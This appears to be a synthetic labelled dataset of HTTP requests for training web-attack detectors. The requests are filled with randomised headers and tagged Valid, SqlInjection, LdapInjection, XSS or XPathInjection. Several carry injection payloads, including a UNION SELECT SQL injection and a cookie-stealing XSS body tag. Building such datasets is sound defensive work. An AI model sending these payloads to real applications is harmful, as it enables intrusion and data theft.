Accept: text/xml;q=0.8
Accept-Charset: iso-10646-ucs-2;q=0.7, x-mac-arabic;q=0.7, windows-1258, x-mac-hebrew
Accept-Encoding: 
Accept-Language: hNfoiasO-oe1wtrb
Cache-Control: only-if-cached
Client-ip: 50.80.85.90
Cookie: smgraYmn=emeta;RB0uC0=3535976;ZBD@=2;ottaauafrwiiog=C8Amo4imac
Cookie2: $Version="73"
Date: Mon, 12 Jan 09 18:38:25 UTC
ETag: W/"WNWeDTFmpVd0Q7FlxxKM"
Expect: zoesod=39oesf
From: tm3ytg@tnto1ssawe.cz
If-Modified-Since: Sat, 04 Feb 06 19:40:33 CET
If-Unmodified-Since: Tue, 13 Oct 09 08:19:11 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 26 Jan 09 08:28:59 UTC
Max-Forwards: 305
MIME-Version: 8.5
Pragma: 8nwnsido='63ara2e'
Proxy-Authorization: sexaho eksno9h=fxRwiiai
Authorization: Digest qop=otqt
Range: 2-
Referer: http://www.HeRn.biz/hdige.jsp
TE: trailers,chunked
Trailer: Referer
User-Agent: hKleauexit/1.0.7
UA-CPU: StrongARM
UA-Disp: 342,103,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3268x616
Via: 5.9 29.72.3.218, Tinnd/2.3 www.ieuu.js, 3.7 www.euneawig.shtml
Transfer-Encoding: gzip
Upgrade: rie/7.4, 5Iena/2.4, fuca/0.7
Warning: 343 www.aS74.js "ImalcxyglU" "Sat, 10 Jul 04 23:42:51 UTC"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 5587841310492306
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

on3w0rtjmeeh=ndtrrebjtyfnSetd0&nwosc=46&2link3iAv4JKvar=46811521&_6lYc.nph-EG2X=Aa>tnullli&e0sUyrerc04fe=lcyaCf2s9pl2os&qoStfbe1s=ele &gNewicTos=v6pChvh\2c&.a24OWmeC.=2091160&4eAumpxlonoe=ysa e&nu=homeentznis2Cea&5lwRMVbinfxp_=fg thttpi tpsw> +&8jHgR=3326754&e8i5aty9=ee  m3[Ntelnet&nhtwonhh=5

End - Id: 6751
Start - Id: 35270
class: SqlInjection
GET /dsqWcigZDu9iknpu-Jau/x3ShQK7K/ewd/ee0schjpaLItYdtoj/Ibtiqivk3leEmg/nu3gseutrgalo/syneErrY1acnryUd6fr.gif?tee=otost&ereohhTn6=uhmmt1%26%27m+ck6a%5Blikeel%5B%7E&re49ds=07946006&htpasswRM=25&6bKDq9WeyG=1mtT6nd&erepi=0365140&i2osnsngls8=ioareai0&icer=o%25a&Ont=32057&etwl4g1neru7e7=%27+++%29+++++UNION++ALL+++++SELECT+++++wa+FROM+++neone++++WHERE+++%28++%27%27%3D++%27 HTTP/1.0
Host: www.suliamunr.st
Connection: close
Accept: text/html;q=0.2, audio/x-wav, text/*;q=0.1
Accept-Charset: x-mac-icelandic, us-ascii, x-mac-ce;q=0.6, x-mac-arabic;q=0.5, x-mac-cyrillic
Accept-Encoding: compress;q=0.1, deflate, deflate, deflate
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 155.132.155.102
Cookie: seherm0=tooee48;Tniiinm=nynqscp:4l;b=aed9;lcarDao=nn;as=ssttaaFcEruyiw;iV=yEn
Cookie2: $Version="87"
Date: Mon, 19 Dec 05 02:43:30 GMT
ETag: "bvEbhRuWJy1AnSCQb"
Expect: er8mb=9eoathib
From: giofe60@1lflop.de
If-Modified-Since: Tue, 30 Sep 08 10:57:26 UTC
If-Unmodified-Since: Tue, 08 Apr 08 17:22:25 CET
If-Match: *
If-None-Match: "1blDjOEEciyxGZ5iMbD-"
If-Range: Wed, 01 Sep 04 10:12:36 UTC
Max-Forwards: 49
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="oCgves"
Authorization: n7ouho 0tad=wpehygri
Range: 930-456,2355-
Referer: /rpfae/dSntedq/ylewldnd/cpdy.mspx
TE: trailers
Trailer: Proxy-Authorization
User-Agent: regketl/2.0.9.3
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 827x876
Via: HTTP/1.6 www.l4ebsode.jpeg:0039, FTP/3.0 14.121.231.100
Transfer-Encoding: deflate
Upgrade: p0emTn/7.1, nmstn/3.3
Warning: 296 6.5.179.123 "hytu1eutoy" 
X-Forwarded-For: 149.48.124.188
X-Serial-Number: 32650890830963017
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35270
Start - Id: 37650
class: LdapInjection
PUT /aKk.H210Y_5MwL3JyU/grje.shtml? HTTP/1.0
Content-Length: 149
Content-Language: laefi,le
Content-Encoding: identity
Content-Location: http://www.unhilH.it/pnzddtlH.cfm
Content-MD5: OWV2c3RhazQ0bHVpZnNCcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Aug 04 21:46:44 CET
Last-Modified: Sat, 23 Oct 04 22:44:05 UTC
Host: 59.232.32.249
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.7, euc-jp;q=0.3, x-mac-arabic;q=0.3, euc-jp
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: ncdstPZ='SE'
Client-ip: 76.236.29.239
Cookie: ett=Ail'8e<ombR
Cookie2: $Version="878"
Date: Sat, 18 Mar 06 17:37:17 GMT
ETag: "2Owh1m2iJKJpAV1Rt"
Expect: 100-continue
From: EEnaeq3@weaSbmldq.fr
If-Modified-Since: Thu, 04 Dec 08 09:04:30 GMT
If-Unmodified-Since: Mon, 27 Aug 07 20:13:38 GMT
If-Match: "NBdhm5sq3xstri0-WP0_"
If-None-Match: *
If-Range: Sat, 14 Jun 08 22:28:16 CET
Max-Forwards: 900
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: /nHi72/batoUie.asmx
TE: chunked
Trailer: TE
User-Agent: n0qer1pob (e.i1D@U; hlZEkZq6; 1sOquM; aOh4YuQD)
UA-CPU: PowerPC
UA-Disp: 8272,2255,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 940x1719
Via: 6.3 www.ixees.html
Transfer-Encoding: identity
Upgrade: eithhe/7.7, qnnlt/0.5, 2teem/8.4, rcndti/9.6
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

laaeYas2=a5Bm&ee9uu0t=mheolietfvtcbl&aSesogbtcxc=wB8Huf-9&ifPXl=s6COWRm&ua1=) t$S&xtes=)   (  | (i9=ats*)&ote=so&i1nwwbe8ecsDhdl=soHZ

End - Id: 37650
Start - Id: 32412
class: Valid
GET /mxnHrmsiw1nasr82rnt/AcohnjitiaxnnsuemecS/178/tJ.4qqo/iQ3@TvI/w@vwaTcxG/a@1luZNLKc3v9/tllsosenlrw8hdraErna/-QqvESYA/hnfTtMIsq3O.Pn@Fh/Y9V1lFSlvFuC@/t1mSrp.jpg?diAeeOQuez=cmdu&5ksdOtcagsu=6848147&u3=leio52cvt&3uEw6=vNGWMifPFfl&aaneoRtthuo=soNtsta2cuey&aaoiFS=ncatn&J-a0X=omewlteg0f&xizDeOnti8teu5x=eRNyaM%40p1t HTTP/1.1
Host: 67.50.22.106:6167
Connection: aaqtlnhO
Accept: */*
Accept-Charset: cp-932, x-mac-arabic;q=0.4, windows-1253;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 212.137.47.131
Cookie: d8geibnmdqni=7emlob vbscriptdkra6ropenimgx1aW;S_ODzl9HEzH=tSypz;mEe=i-peFl;mgEiframeH6=aal8xe2@3To;g8yh=aEwmEcpositionwp-l
Cookie2: $Version="42"
Date: Fri, 23 Jan 09 09:32:16 GMT
ETag: W/"93RUwlNG4KegyyA"
Expect: 100-continue
From: sseoNare@Hmcy7r3ai.gov
If-Modified-Since: Sat, 28 Nov 09 01:01:21 UTC
If-Unmodified-Since: Tue, 14 Jun 05 18:40:09 GMT
If-Match: "suG8SxbIdGBQ_BB"
If-None-Match: *
If-Range: Thu, 01 Sep 05 18:32:51 GMT
Max-Forwards: 5
MIME-Version: 6.4
Pragma: mqueen=mr8z
Proxy-Authorization: NTLM cXI0cm92enJpdWFsNmtnMWN5Y3Nsd2l0NDduZWVlZXJuZm9l
Authorization: Digest response="f4Bd4ab805995D7df7943C3cdbA2FbEb"
Range: -9,-9053,093-28
Referer: http://t4edira.ch/fjrs7og.exe
TE: chunked;q=0.7,chunked;q=0.4,gzip;q=0.7
Trailer: TE
User-Agent: eheUt/5.4.0.7.7
UA-CPU: MIPS
UA-Disp: 7145,6642,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 441x524
Via: rot/3.0 www.rhnuRw.htm, 6.2 www.hluyx.jpg
Transfer-Encoding: deflate
Upgrade: wrt/4.4
Warning: 836 141.65.153.233:359 "iornrlaImBreqs" "Sun, 16 Mar 08 07:29:36 GMT"
X-Forwarded-For: 15.195.139.253
X-Serial-Number: 2700091210
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32412
Start - Id: 46850
class: XSS
PUT /execvtdocumentPWSAWnullftid/4JReGisM7V3uleT/4eosdksglnsslrrhaih/assoVXJjt_d/aFPi.tiff? HTTP/1.0
Content-Length: 140
Content-Language: ipieu,mAd
Content-Encoding: deflate
Content-Location: /vycredrs/eseitw.jpg
Content-MD5: bWxhc2Fhc2dzd3RybmVldQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Dec 08 23:37:27 CET
Last-Modified: Fri, 14 Sep 07 24:03:33 GMT
Host: www.eWikj.it
Connection: close
Accept: audio/basic
Accept-Charset: iso-8859-2, iso-2022-kr
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 175.15.203.198
Cookie: nmaalirs7=cViokP9clakenrT3;io=;tmpaoem)eYtytprocessing-instructionie;idPehmfirpcbi=0;Anclfs6V=xa;qAusrkM=7eylat)talll Aee;1gueMOaccess_log51pUM=rdwe3ras
Cookie2: $Version="455"
Date: Thu, 24 Aug 06 20:37:00 GMT
ETag: "HTJvF.2qTzNngibZ14mg"
Expect: 100-continue
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Fri, 30 Jun 06 08:08:30 UTC
If-Unmodified-Since: Tue, 29 Jan 08 19:51:14 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 01 Jul 06 07:31:48 CET
Max-Forwards: 0
MIME-Version: 2.6
Pragma: kswl='m6Uenf'
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: NTLM ZWxMaGlwdHNlYnNicmRyNXdFaVdPYWdvZ2VzZXJhNzNiYWlka2Vl
Range: -85
Referer: /jatavt/Hnatbuns/neme9Xpi/WtnL8qw4.doc
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/1.6 (Windows; U; Win 9x 7.7; ga-dd; rv:8.2.9) Gecko/43210110
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 3.1 www.vrdrda.html, 5.0 www.rtdH5A.html:7
Transfer-Encoding: mteh
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

teTws=I 8et&include4SvHPjM=ea"    ><body%20onload=alert  (document.cookie);    >&uIwhkt9wiue=4233795&IhtnHQhbi=ebabeiimaoe

End - Id: 46850
Start - Id: 3958
class: Valid
POST /effAhdT6iO-Y/c2s/1@CYYDaQ/eiftlbeeoi0lbTMfrsj/imrtie8/iQp7VCpLiBcst.tiff? HTTP/1.0
Content-Length: 120
Content-Language: u
Content-Encoding: compress
Content-Location: /we1e9s/adE1nme/aouN4ne/iumemE/eWnn.shtml
Content-MD5: UW5zZWNlTndOaGV6dDdMdg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Aug 06 08:49:39 GMT
Last-Modified: Fri, 02 Jun 06 21:46:19 CET
Host: www.nohs.gov
Connection: keep-alive
Accept: image/png, image/*;q=0.1
Accept-Charset: us-ascii, iso-8859-9, x-mac-arabic;q=0.5
Accept-Encoding: identity
Accept-Language: tsea32ee-ettC;q=0.1, o6-nan;q=0.9, ss9eii-etihaml;q=0.7
Cache-Control: no-store
Client-ip: 136.220.245.74
Cookie: o2zsdhFAS5j=1396;egedi=5e6/o$iorMicsn];herde=9ytveeqyeanrrwfete
Cookie2: $Version="1"
Date: Tue, 04 Mar 08 14:58:15 GMT
ETag: "cRPrR_WMKHJ7ipmhoi"
Expect: 100-continue
From: eenhAhys@zepotsdfNt.it
If-Modified-Since: Thu, 14 Dec 06 06:16:55 GMT
If-Unmodified-Since: Thu, 22 Mar 07 06:35:08 GMT
If-Match: "2rJj_fCrOzPgZxLfEM"
If-None-Match: *
If-Range: "mdV@Om2a6qguKGv"
Max-Forwards: 7540
MIME-Version: 7.8
Pragma: emt='brmst'
Proxy-Authorization: Digest cnonce="yoehanfr"
Authorization: Basic YXdxczpkYmhqZWk=
Range: 896403-560156,-23134
Referer: http://www.Lmwnet.st/bTsq5n/pzEs/snl0ar/nfsPa.asp
TE: trailers,gzip;q=0.3,deflate;q=0.3
Trailer: Accept
User-Agent: Mozilla/2.9 (compatible; MSIE 4.3; Solaris; 1hrgel)
UA-CPU: Sparc
UA-Disp: 905,734,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6900x1160
Via: ennd/0.5 173.107.206.79:640, HTTP/4.7 170.86.87.110, TzM3/0.9 www.obysmgee.shtml
Transfer-Encoding: gzip
Upgrade: tnoc/2.8, twh/6.6, d0clah/7.2
Warning: 029 www.TasA.js "noEv8wnrwRfeseqNeptc" "Sat, 01 Nov 08 03:38:50 CET"
X-Forwarded-For: 152.216.247.81
X-Serial-Number: 194828763
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

t2mttm=srLwon1aXoru|&Yj93Vb-WA=12439204&8ent2tepes7eyz=hfa9&lue7ri=5YLN&OKZQ7TrS=7678040978&dge33dtEreaT5ta=nL5xFMmZmR

End - Id: 3958
Start - Id: 9482
class: Valid
GET /OxdivW3.passwdMKx2jIE_/ceelheeba7bNnerlna/outerrrcd8elaeotf/sr/jQNtmpomw7bQo8vW.php4?rjKeSeilivm6leU=998778536&rN=-%3B&sdprsazsai=l+&dio=lmakmoVObLxd&A3kQexeclogCuprocessing-instruction5e=i%7C&UxitphrecaA=1uG9j&s63bCaaE=24&eVetcN1hNL=0&iwindow.openwD=6escdocopyl95de7ueeo9&_Nindw=fdpassthru%7Cp&6eoSr=pNKrm5Vv5F HTTP/1.1
Host: 125.34.224.117
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.4, x-mac-chinesetrad;q=0.6
Accept-Encoding: *
Accept-Language: 1-nsesu9pc;q=0.0, yaxrL-ntan8a;q=0.6, to5z9-2ksg;q=0.9
Cache-Control: max-stale
Client-ip: 70.73.231.148
Cookie: hthghlykW4shsh=uenoFw7stake;sedzsber=b6replace1/;en74p=tri)f;eodhwliroSernan=92
Cookie2: $Version="2"
Date: Tue, 18 Apr 06 07:12:31 CET
ETag: W/"OV8lIQPxR4a1ovUasGG"
Expect: 100-continue
From: eo4la2@wre9irnxdA.be
If-Modified-Since: Mon, 12 Jan 04 06:49:19 CET
If-Unmodified-Since: Sat, 07 May 05 13:21:48 CET
If-Match: "60CqbyJWyk6@y7W"
If-None-Match: *
If-Range: *
Max-Forwards: 3833
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Ytur ieceeric=xuqi
Authorization: NTLM T29FZXZ1aWU1aXM3aHBwYzdZZWVlbHlqaUU5RW9kY21ob24=
Range: -6,7-441
Referer: http://www.faME.de/I3g0f/tuadb/4sseheae/alhfo.jpg
TE: gzip;q=0.0,trailers
Trailer: Accept
User-Agent: Mozilla/1.4 (X11; U; Open BSD i386 7.0; Ia-rh; rv:8.1.4) Gecko/29750374
UA-CPU: MIPS
UA-Disp: 635,8626,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 279x7075
Via: pj2/6.1 58.231.161.184:7
Transfer-Encoding: compress
Upgrade: dttwl/5.1, totora/7.4, s2q/7.4
Warning: 567 www.enh7hD.js "3todocz5ta" "Tue, 13 Nov 07 04:16:24 UTC"
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 477624776956
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9482
Start - Id: 31468
class: Valid
GET /mu8vq2XjGa/r8whgexans7syas/j5vSuNqQG2@3/vrnf5toi6dib/pt6iocicimrceRi/reTmitlE2srlethc/rv.QWkIBWnnpWz.pl?ip7seiedl=eYFBor%40&ohByhhesiEuEI=56791331 HTTP/1.1
Host: www.oortefydis.gov:37
Connection: close
Accept: application/*;q=0.5, application/*, text/*;q=0.7
Accept-Charset: windows-1251;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 126.132.65.203
Cookie: K.B0=eeum(sttsamu%eso;mfrrTaheitGt=Brnm4dshoE o;RconnectDoV=kjfstuifuaiph32i
Cookie2: $Version="8"
Date: Fri, 11 Jan 08 08:38:25 GMT
ETag: "9xymynxfEbpm3yxYm"
Expect: 7rclau
From: gdf9c@jueelrawg9.de
If-Modified-Since: Tue, 25 May 04 14:31:00 CET
If-Unmodified-Since: Tue, 07 Oct 08 15:42:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5319
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM cWQ2a3FmZWlTdDR2cWhyTzVOcG9uNmR1Ykh5cnRqaG50Yw==
Authorization: Basic aWhlczpFZGxiZWN0Yg==
Range: 024-703,-943,-1578
Referer: /aInaisdz/aeEll/Sbljllr9/dePhtd7V.cfm
TE: trailers
Trailer: Transfer-Encoding
User-Agent: msrr (l9y077Ph; tK9X21S)
UA-CPU: Sparc
UA-Disp: 7523,3452,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 389x351
Via: 8.7 www.hoscda.html, fEeOD/1.0 46.85.210.207
Transfer-Encoding: emiet
Upgrade: nru/5.8, ett/0.4, tbh9/3.1
Warning: 701 www.eidmrek.tiff "nxaiehq8edtge" "Sat, 02 Jul 05 03:49:42 CET"
X-Forwarded-For: 176.134.48.18
X-Serial-Number: 1337403720563308
----: ------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31468
Start - Id: 49695
class: XPathInjection
GET /e-TGbK/cmC/gFKdn86/jRkFdPJ6eh@d0.UfCBu/sS/yLel0Yami3/ov8.hVR5O_tZ4WR/g1drwpoEofer7htx/i5xU.QN3oiGtyXrN2gv.jpeg?atwQo5g=ecj&lAC=fserviceseya&iuohicnfGas=29&eE=aeD&f.e5=978&ptm1tNc=enri&sn6izkewseu=69605&agg=4tKhw%27+++++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or+++%27aita%27+++%3D+%27 HTTP/1.0
Host: www.wttivceser.cz:80
Connection: oumo3ez
Accept: application/rtf, image/png
Accept-Charset: iso-8859-6;q=0.1
Accept-Encoding: gzip;q=0.2, gzip
Accept-Language: dbstx4od-a6d7d, 9ic-cEjth, i-dntes;q=0.3
Cache-Control: no-cache
Client-ip: 108.128.7.126
Cookie: ldeq0h=ysLA6bB3CnA;uw=sN2wA;q6ejseedtq10s=3594552493;oJniD4VuH=slhasIansmrRted1
Cookie2: $Version="03"
Date: Tue, 23 Mar 10 02:21:43 CET
ETag: W/"TepWF6.gWgxd88z"
Expect: iazqtree
From: tmHtei@9Eaetn4.de
If-Modified-Since: Tue, 27 Apr 04 21:14:11 CET
If-Unmodified-Since: Sat, 02 Dec 06 17:19:34 CET
If-Match: "VRZNLayvyq-fElq-"
If-None-Match: *
If-Range: Sat, 04 Jun 05 04:06:52 CET
Max-Forwards: 08
MIME-Version: 8.1
Pragma: k1ehsu1=d
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: NTLM ZHpwRXJyZGF3cmFFbmh0bnRhU2xlbHNUdHQ4ZWVhZXVy
Range: -394122
Referer: /woEt/7ko7rwli/oiqi/Ps2O/lulHan.gif
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: fa8rW7Ee2t
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: HTTP/7.0 www.oe5nl.jpg, 9.6 www.Parxds.js, 5.6 207.194.62.105:89
Transfer-Encoding: compress
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49695
Start - Id: 28048
class: Valid
GET /1mW.gif?e1dhklrgbymexd=25211806&eenhweo=8&19f=saolEocy0eoFii&gHmaEiyBWedtssn=eQpKOR_29jdi&d7=%5Dp2Ai&ceatplec=ocg7Jy&abhtahne=h&hoaalfdNih=tzQIGY&enraMaq=mGVlkCfq6Gs-&R4=s&msaesb=dbhahstusliket%3Ca%3D%7En&als=wT5HE&neToit2I=vargl&msiqotn=pcYwWDKl7suQ&ye=20350 HTTP/1.0
Host: 254.194.236.228:80
Connection: close
Accept: */*
Accept-Charset: windows-1253;q=0.5, windows-874;q=0.1, iso-2022-kr, iso-8859-2;q=0.6
Accept-Encoding: compress, deflate, gzip, deflate;q=0.2, gzip
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 218.33.30.72
Cookie: yoi0ORg1w=914;Sanefi=ea75$iy;8Z4nconnectqP=sntxmlechoAlfiudx
Cookie2: $Version="13"
Date: Wed, 13 Jul 05 05:10:41 UTC
ETag: W/"8p1XGA.Gdu1L5dMF8FYG"
Expect: jbdp
From: gu9cDaia@ar6it9.st
If-Modified-Since: Thu, 11 Feb 10 06:00:43 UTC
If-Unmodified-Since: Sun, 17 May 09 21:52:34 UTC
If-Match: *
If-None-Match: "czKW1fG8XNrQ.2wRcklo"
If-Range: Fri, 28 May 04 19:55:07 UTC
Max-Forwards: 0122
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic Yjllbndob2w6dHIxcmU=
Authorization: Basic c2lTZTp0b3VhbnI=
Range: -570
Referer: http://www.19dlgl.uk/M6zJeui/ahtsarnq/huoyiWd/Shne.js
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.7 (Machintosh; U; PPC 2.2; e8-Wl; rv:4.8.6) Gecko/56980619
UA-CPU: Sparc
UA-Disp: 352,634,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4477x7117
Via: 8.7 www.dv6nhhS.css, HTTP/3.9 170.182.200.224
Transfer-Encoding: etKex; snHnnnsd=Ecetiead
Upgrade: oe2lo1/5.5, meme/3.9, dxyas/2.0
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 140.27.28.161
X-Serial-Number: 981815102258
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28048
Start - Id: 12681
class: Valid
GET /eQ1-@@PM73gB7vbg/eodY_o8C/rGPlS-LwJ5/ekFqUhpjvAf/a-FM8xm-VoHN1ERA.VU/duqPzT7iOhqBtoPyh52s.html?G3tQENLk7e2=ttgoobjects%29epasswd&Q9EECnull=692 HTTP/1.0
Host: 100.227.90.196
Connection: close
Accept: audio/x-wav;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, deflate;q=0.3, identity;q=0.3, gzip, gzip
Accept-Language: oaS-Ooahut9e, nTtcSiR-o4mis, dbvtu-tels;q=0.4, cniEer-cmeEo
Cache-Control: min-fresh=46697
Client-ip: 40.108.235.175
Cookie: edn=01;sa9Eeqoy=54441870;cDW_=nodetmp;dtT3idwreoii=rRu
Cookie2: $Version="4"
Date: Sun, 21 Oct 07 12:06:28 UTC
ETag: "Z6bDR6ol6FudYgKgsa"
Expect: 100-continue
From: s1e6fm1@jrtgutet.biz
If-Modified-Since: Sun, 16 Oct 05 20:21:10 GMT
If-Unmodified-Since: Thu, 18 Oct 07 23:12:51 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Feb 10 15:54:55 UTC
Max-Forwards: 3
MIME-Version: 3.8
Pragma: t7tIen5t=ekoUsi
Proxy-Authorization: Basic bzJtc3RTdDpyc3JnaXB0Tw==
Authorization: hkPedt einsnc=lIImlmc
Range: 123920-
Referer: http://www.qdgieta.org/oamu27/1edy8/8diajhet.zip
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/4.3 (compatible; Konqueror/9.9; SunOS sun4u; sterzwmyau)
UA-CPU: Sparc
UA-Disp: 8687,0336,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 118x1271
Via: 5.0 www.Idtezuir.tiff:9797
Transfer-Encoding: gzip
Upgrade: sto2/5.6, i35ueo/6.1, obrejt/0.3, it5/7.0, igelon/5.7
Warning: 641 www.nTPq.png "nteo1bei1ie" "Sat, 05 Apr 08 24:06:12 UTC"
X-Forwarded-For: 16.208.183.253
X-Serial-Number: 444066878
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 12681
Start - Id: 15892
class: Valid
GET /etlkshwfRfPb/nsirats/7eIubh3vgi3/@qestdinW/r6JnNfDj_S911V_DE/PQJYbiA_6T/uOeTSqU1fOwZVtETbp/3d51Bfm_/rZ9MT7OrPLT6T/z.t/f.TWtmidCOwv@bmyVsy/mAA@Zk.jG5C3.bin?dyctfdB=f8&Vfx_PE7q4NQadmin=onsm&oMe4akr1c7Iroh=05086&3ae=eoyA&DwKfid=75410&6minputcopya=rcp%27ff&r36i=7&Tmennzawif=hcTjIZOtwd&opnrw=o2ayx7TS&ttt2iwhw=5 HTTP/1.0
Host: www.1vob.de
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: identity, deflate, deflate;q=0.0, identity;q=0.1, gzip;q=0.9
Accept-Language: pjcnoo5-Aw;q=0.5, maegw-ltrnattr, l-ut, nsph9rvm-cicsnlit;q=0.9, tswd3-Ausie;q=0.4
Cache-Control: no-transform
Client-ip: 188.12.243.240
Cookie: nxoaetmn=zs;Eerookseg=fTINWug;ebinTEUser5ieo=92049
Cookie2: $Version="8"
Date: Sun, 16 Nov 08 13:10:53 UTC
ETag: W/"zNM1sZ70pkYR7sUn"
Expect: bnwaa=srawoA
From: 1nNrdio@oirSyea.com
If-Modified-Since: Sat, 17 Nov 07 07:58:49 UTC
If-Unmodified-Since: Thu, 17 Jan 08 14:14:29 GMT
If-Match: "0d0ttCXd1FXWIlBD-"
If-None-Match: "ODS@LJb7dYxUYx4CJx"
If-Range: *
Max-Forwards: 02
MIME-Version: 5.2
Pragma: ortAdlie=edFEafI
Proxy-Authorization: nogyu eet8g=aNnn
Authorization: Digest qop=usid
Range: 141-7620
Referer: /tAqg/osEe/utiomxr/dhth1/lwrrtMt4.js
TE: trailers,gzip;q=0.4
Trailer: Host
User-Agent: teoisrtnal (sWryQ@g)
UA-CPU: PowerPC
UA-Disp: 318,100,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8462x915
Via: 0.8 www.isom.jpeg:2, FTP/5.8 www.eisstanh.jpeg:85, oseyw/3.3 www.3cnu.htm
Transfer-Encoding: d6pi
Upgrade: afum9l/8.2, fEaii8/5.9, som/7.2
Warning: 388 49.6.211.58:81 "nxswXrldl4frutnt" "Fri, 06 Mar 09 15:26:32 GMT"
X-Forwarded-For: 185.247.30.17
X-Serial-Number: 495532176106
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15892
Start - Id: 23760
class: Valid
GET /mdelni5aaeeuYss/se/wb2JdDR-6RFCic13cf@U/iETPsqS48YBCPqjD8STU/iehiu5l1eahfi/PKl/iyy-oDSePWClKin/aniomeauthy/aW2B04/zst/xaiqdeo.sh?etor=12&97SWF8EOh=tHh7wia&pnPWexec=esrif&scriptSTnty=b&autoexec61nFx=hero+Oi%28hxr&rtyu=hax&eosf=eLZENngZM5EU&wrhaesanelIQo=+6g%2B+s&tcekiho=97&eTci79r=adWcEQ8AJnY&bee=ia&nsunsnRnyn=35 HTTP/1.1
Host: www.nfzkirtfs.com:80
Connection: close
Accept: video/mpeg, image/jpeg
Accept-Charset: utf-7, x-mac-turkish;q=0.0, koi8-r
Accept-Encoding: compress, identity;q=0.0
Accept-Language: nitr-amlty;q=0.1, pea-rn, i-uoe;q=0.8, d-9f
Cache-Control: no-cache
Client-ip: 139.204.120.139
Cookie: tRIdNnntacNit=tu;ntnas4gDhuli=9;iS7uTD=eieiiNdotey;greogBrst6Ltvun=; iehinneval7wl
Cookie2: $Version="53"
